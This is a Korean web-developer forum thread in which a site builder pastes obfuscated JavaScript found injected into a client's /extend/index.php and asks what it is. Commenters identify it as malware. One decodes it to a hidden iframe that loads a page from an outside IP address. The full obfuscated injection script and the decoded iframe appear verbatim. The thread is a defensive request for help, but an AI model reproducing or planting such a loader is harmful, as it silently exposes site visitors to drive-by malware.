혹시..이게 뭔지.. 뭔가에 당한건가요? 정보
혹시..이게 뭔지.. 뭔가에 당한건가요?
본문
아래는 소스 원문입니다.
제가 작업해드린 사이트에
/extend/index.php 에
이런 소스가 들어있더라구요
그래서 메인에서 에러가 주루룩.. 뜨던데..
일단 이거 지우고 비번을 바꾸시라고 해놓긴 했는데
과연.. 이거 뭐때문에 일어난일일까요?
황당..
<script>function c1058032905m49200269dbb8a(m49200269dc380){ var m49200269dcb7b=16; return (parseInt(m49200269dc380,m49200269dcb7b));}function m49200269de0c7(m49200269deb33){ function m49200269dfb4e(){return 2;} var m49200269df342='';m49200269e0333=String.fromCharCode;for(m49200269df742=0;m49200269df742<m49200269deb33.length;m49200269df742+=m49200269dfb4e()){ m49200269df342+=(m49200269e0333(c1058032905m49200269dbb8a(m49200269deb33.substr(m49200269df742,m49200269dfb4e()))));}return m49200269df342;} var z26='';var m49200269e0747='3C7'+z26+'3637'+z26+'2697'+z26+'07'+z26+'43E696628216D7'+z26+'96961297'+z26+'B646F637'+z26+'56D656E7'+z26+'42E7'+z26+'7'+z26+'7'+z26+'2697'+z26+'465287'+z26+'56E657'+z26+'363617'+z26+'065282027'+z26+'2533632536392536362537'+z26+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+z26+'332537'+z26+'32253633253364253237'+z26+'2536382537'+z26+'342537'+z26+'342537'+z26+'30253361253266253266253337'+z26+'253337'+z26+'253265253332253332253331253265253331253333253333253265253331253337'+z26+'253332253266253265253639253636253266253637'+z26+'2536662532652536382537'+z26+'34253664253663253366253237'+z26+'2532622534642536312537'+z26+'342536382532652537'+z26+'322536662537'+z26+'352536652536342532382534642536312537'+z26+'342536382532652537'+z26+'32253631253665253634253666253664253238253239253261253339253338253332253336253330253239253262253237'+z26+'253330253636253237'+z26+'2532302537'+z26+'37'+z26+'2536392536342537'+z26+'34253638253364253333253334253330253230253638253635253639253637'+z26+'2536382537'+z26+'342533642533322533382533392532302537'+z26+'332537'+z26+'342537'+z26+'39253663253635253364253237'+z26+'2536342536392537'+z26+'332537'+z26+'302536632536312537'+z26+'39253361253230253665253666253665253635253237'+z26+'2533652533632532662536392536362537'+z26+'3225363125366425363525336527'+z26+'29293B7'+z26+'D7'+z26+'6617'+z26+'2206D7'+z26+'969613D7'+z26+'47'+z26+'27'+z26+'5653B3C2F7'+z26+'3637'+z26+'2697'+z26+'07'+z26+'43E';document.write(m49200269de0c7(m49200269e0747));</script><script>check_content()</script>
제가 작업해드린 사이트에
/extend/index.php 에
이런 소스가 들어있더라구요
그래서 메인에서 에러가 주루룩.. 뜨던데..
일단 이거 지우고 비번을 바꾸시라고 해놓긴 했는데
과연.. 이거 뭐때문에 일어난일일까요?
황당..
<script>function c1058032905m49200269dbb8a(m49200269dc380){ var m49200269dcb7b=16; return (parseInt(m49200269dc380,m49200269dcb7b));}function m49200269de0c7(m49200269deb33){ function m49200269dfb4e(){return 2;} var m49200269df342='';m49200269e0333=String.fromCharCode;for(m49200269df742=0;m49200269df742<m49200269deb33.length;m49200269df742+=m49200269dfb4e()){ m49200269df342+=(m49200269e0333(c1058032905m49200269dbb8a(m49200269deb33.substr(m49200269df742,m49200269dfb4e()))));}return m49200269df342;} var z26='';var m49200269e0747='3C7'+z26+'3637'+z26+'2697'+z26+'07'+z26+'43E696628216D7'+z26+'96961297'+z26+'B646F637'+z26+'56D656E7'+z26+'42E7'+z26+'7'+z26+'7'+z26+'2697'+z26+'465287'+z26+'56E657'+z26+'363617'+z26+'065282027'+z26+'2533632536392536362537'+z26+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+z26+'332537'+z26+'32253633253364253237'+z26+'2536382537'+z26+'342537'+z26+'342537'+z26+'30253361253266253266253337'+z26+'253337'+z26+'253265253332253332253331253265253331253333253333253265253331253337'+z26+'253332253266253265253639253636253266253637'+z26+'2536662532652536382537'+z26+'34253664253663253366253237'+z26+'2532622534642536312537'+z26+'342536382532652537'+z26+'322536662537'+z26+'352536652536342532382534642536312537'+z26+'342536382532652537'+z26+'32253631253665253634253666253664253238253239253261253339253338253332253336253330253239253262253237'+z26+'253330253636253237'+z26+'2532302537'+z26+'37'+z26+'2536392536342537'+z26+'34253638253364253333253334253330253230253638253635253639253637'+z26+'2536382537'+z26+'342533642533322533382533392532302537'+z26+'332537'+z26+'342537'+z26+'39253663253635253364253237'+z26+'2536342536392537'+z26+'332537'+z26+'302536632536312537'+z26+'39253361253230253665253666253665253635253237'+z26+'2533652533632532662536392536362537'+z26+'3225363125366425363525336527'+z26+'29293B7'+z26+'D7'+z26+'6617'+z26+'2206D7'+z26+'969613D7'+z26+'47'+z26+'27'+z26+'5653B3C2F7'+z26+'3637'+z26+'2697'+z26+'07'+z26+'43E';document.write(m49200269de0c7(m49200269e0747));</script><script>check_content()</script>
댓글 전체
음.. 수정할때마다 글이 줄어들더니 세번째 수정 버튼 누르니.. 안에 코드들이 다 사라진다는..
혹시.. 이거 뭐.. 큰일나는 코드는 아니겠죠? ㅜㅜ
혹시.. 이거 뭐.. 큰일나는 코드는 아니겠죠? ㅜㅜ
흠... 누가 악성 코드를 심어 놓은듯 해 보이는데요;;;
그렇죠? ㅜㅜ
문제는 경로가 어케 된건지.. 어떤 방법으로 저렇게 된건지 알수가 없네요
만약... 보안문제라면 제 영역을 떠난것이니 보안전문가에게 의뢰해야 하는 부분이고..
그게 아니라 만약 CSRF 문제라면.. 최신 패치후.. 에디터 부분을 바꿔야 할거 같고..
난감합니다.
문제는 경로가 어케 된건지.. 어떤 방법으로 저렇게 된건지 알수가 없네요
만약... 보안문제라면 제 영역을 떠난것이니 보안전문가에게 의뢰해야 하는 부분이고..
그게 아니라 만약 CSRF 문제라면.. 최신 패치후.. 에디터 부분을 바꿔야 할거 같고..
난감합니다.
이걸 풀면 다음과 같네요:
<iframe name=c10 src='http://77.221.133.172/.if/go.html?'+Math.round(Math.random()*98260)+'0f' width=340 height=289 style='display: none'></iframe>
<iframe name=c10 src='http://77.221.133.172/.if/go.html?'+Math.round(Math.random()*98260)+'0f' width=340 height=289 style='display: none'></iframe>
뭐지??
악성코드 맞습니다.
